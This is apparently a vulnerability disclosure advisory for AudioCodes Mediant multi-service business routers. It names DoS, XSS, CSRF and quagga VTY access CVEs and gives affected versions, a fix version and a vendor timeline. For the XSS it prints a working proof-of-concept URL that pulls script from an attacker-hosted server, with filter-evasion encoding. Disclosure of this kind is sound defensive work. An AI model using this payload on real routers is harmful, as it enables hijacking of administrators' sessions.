AudioCodes Mediant family of multi-service business routers (MSBRs) offers service providers a range of all-in-one SOHO, SMB and SME routers combining access, data, voice and security into a single device.[1]
During our research we found a DoS(CVE-2019-9228), a XXS(CVE-2019-9230) and CSRF(CVE-2019-9231) vulnerability. Although we could gain access to quagga VTYs(CVE-2019-9229).
A cross-site scripting (XSS) vulnerability in the search function of the management web interface allows remote attackers to inject arbitrary JS or HTML code via the keyword parameter. This is possible because a wrong content-type header (text/html instead of application/json) is set.
/SearchResults.json
Parameter: keyword
An attacker could load External JavaScript code from a webserver. The the values are converted to uppercase and the length of the URL is limited. The attacker can host a file named "A" and the content alert("XSS");on his webserver and trigger the XSS via the following URL:
http://<ROUTERIP>/SearchResults.json?keyword=<script+src+%254D+http%253A//<ATTACKERIP>/a></script>
The encoding has to be applied for filter evasion.
F7.20A to F7.20A.253
Update to F7.20A.254 or higher.
| 2019/02/14 | vendor contacted |
| 2019/02/14 | initial vendor response |
| 2019/02/14 | vendor informs about start of review process |
| 2019/02/15 | vendor requests further details |
| 2019/02/15 | further details provided |
| 2019/02/18 | vendor informs about detail analysis |
| 2019/02/19 | vendor confirmation, planned fixes and roadmap provided |
| 2019/03/01 | CVEs assigned |
| 2019/06/28 | vendor informs that planned fixes are published |